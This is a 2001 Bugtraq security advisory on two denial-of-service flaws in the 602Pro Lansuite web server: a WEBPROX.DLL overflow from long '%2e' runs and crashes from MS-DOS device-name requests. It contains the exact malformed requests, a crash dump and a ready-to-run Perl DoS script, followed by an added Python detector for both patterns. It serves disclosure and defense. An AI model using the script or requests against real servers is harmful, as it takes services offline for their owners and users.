Bugtraq mailing list archives

602Pro Lansuite Denial Of Service 1.0.34


From: nitr0s () HOTMAIL COM
Date: Mon, 26 Mar 2001 11:58:27 -0000

Advisory Name: Lansuite Webserver Denial of Service
   Discovered: 8th and 23rd of March 2001
  Application: 602Pro Lansuite 2000a 1.0.34 - prior versions and possibly 1.0.35
     Platform: Windows 2k, 95/98/NT - others unknown
     Severity: Denial of service from application
       Credit: Liamer () eircom net
Vendor Status: Unknown - http://www.602software.com/

Description:

There are 2 problems: the first is a buffer overflow in WEBPROX.DLL and the other is in relation to MS-DOS device files. Credit should be given to Gründl <peter.grundl () defcom com>, who made me think of trying this same problem that he found in the Alt-N Technologies MDaemon WebConfiguration feature, which also affects Xitami Webserver 2.4b5 and probably a whole load of other Windows server programs.

Demonstration:

Connect to the webserver and send the following request:

GET /%2e%2e%2e%2e.... /HTTP/1.0

where %2e is repeated over 157 times.

The server, depending on how many times %2e or [.] is sent, will exit displaying the following error:

LANSUITE caused an invalid page fault in
module WEBPROX.DLL at 015f:008a1326.
Registers:
EAX=0000000a CS=015f EIP=008a1326 EFLGS=00010216
EBX=00000008 SS=0167 ESP=05202848 EBP=05202848
ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
Bytes at CS:EIP:
8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
Stack dump:
052029dc 00862e9a 0000000a 334f2b1f 000000fa 81623ff0 81648e38 00000008
bff7b317 018d0000 00000000 018d1650 018d1650 0520ace7 018d164c 052028cc


The other problem is requesting MS-DOS device files; send the following request to the webserver on port 80:

GET /aux

---------------------------------------------------------------
#!/usr/bin/perl
#
# 602Pro Lansuite 2000a 1.0.34 Denial Of Service
#
# Malformed GET request
#
use strict;
use warnings;
use Getopt::Std;
use Socket;

my %args;
getopts('s:', \%args);
if (!defined($args{s})) { usage(); }

my ($serv, $port, $foo, $number, $data, $buf, $in_addr, $paddr, $proto);

$foo    = "%2e";                       # URL-encoded "."
$number = 160;                         # repeat count; the fault appears above 157
$data   = $foo x $number;
$serv   = $args{s};
$port   = 80;
$buf    = "GET /$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr   = sockaddr_in($port, $in_addr) || die("Error: $!\n");
$proto   = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) || die("Error: $!");
select(S); $| = 1; select(STDOUT);      # unbuffered writes on the socket
print S $buf;
close(S);

print("Data has been successfully sent to $serv\n");

sub usage { die("\n\n$0 -s <server>\n\n"); }
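As an added example that is not part of the original advisory or of the 602Pro product, the following Python request-line checker shows how both conditions described above can be picked out of web-server request logs: a percent-decoded path with a run of dots longer than the 157 the advisory reports, and a path segment whose stem is a reserved MS-DOS device name. The threshold, the full device-name list (the advisory only shows "aux") and the sample request lines are assumptions and constructed data, not values from the page.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names. Windows resolves these in any directory and
# also when an extension follows the name (e.g. "aux.txt"), so the check
# below compares the stem of each path segment.
DOS_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# The advisory reports crashes once "%2e" is repeated more than 157 times.
# Hypothetical tuning knob for this detector, not a value from the product.
DOT_RUN_THRESHOLD = 157

# Deliberately loose: only method and request-target are needed, so the
# HTTP/0.9-style "GET /aux" and the odd " /HTTP/1.0" suffix both parse.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)")


def classify_request(line: str) -> list[str]:
    """Return the findings for one HTTP request line (empty list if clean)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return ["malformed-request-line"]
    # Drop the query string, then percent-decode once so "%2e" and "." compare alike.
    path = unquote(m.group("target").split("?", 1)[0])

    findings = []
    longest_dot_run = max((len(run) for run in re.findall(r"\.+", path)), default=0)
    if longest_dot_run > DOT_RUN_THRESHOLD:
        findings.append(f"dot-run:{longest_dot_run}")
    for segment in path.split("/"):
        stem = segment.split(".", 1)[0].upper()
        if stem in DOS_DEVICES:
            findings.append(f"dos-device:{segment}")
    return findings


def scan_log(lines) -> dict[int, list[str]]:
    """Map 1-based line numbers to findings, for the lines that have any."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify_request(line))}


# Constructed sample request lines (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /" + "%2e" * 160 + " /HTTP/1.0",   # the advisory's overflow request
    "GET /aux",                              # the advisory's device-file request
    "GET /docs/aux.txt HTTP/1.1",            # device name with an extension
    "GET /" + "." * 40 + "/x HTTP/1.0",      # long dot run, but below threshold
]


def findings_for_samples() -> dict[int, list[str]]:
    return scan_log(SAMPLE_REQUESTS)


if __name__ == "__main__":
    for n, f in findings_for_samples().items():
        print(f"line {n}: {', '.join(f)}")
```

Run it as a script to see which of the constructed sample lines are flagged; to use it on real logs, feed only the request-line field of each log entry to scan_log. The path is decoded once, so a double-encoded "%252e" would still read as "%2e" after decoding and escape the dot-run check; a stricter deployment would reject any "%" left in the decoded path.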

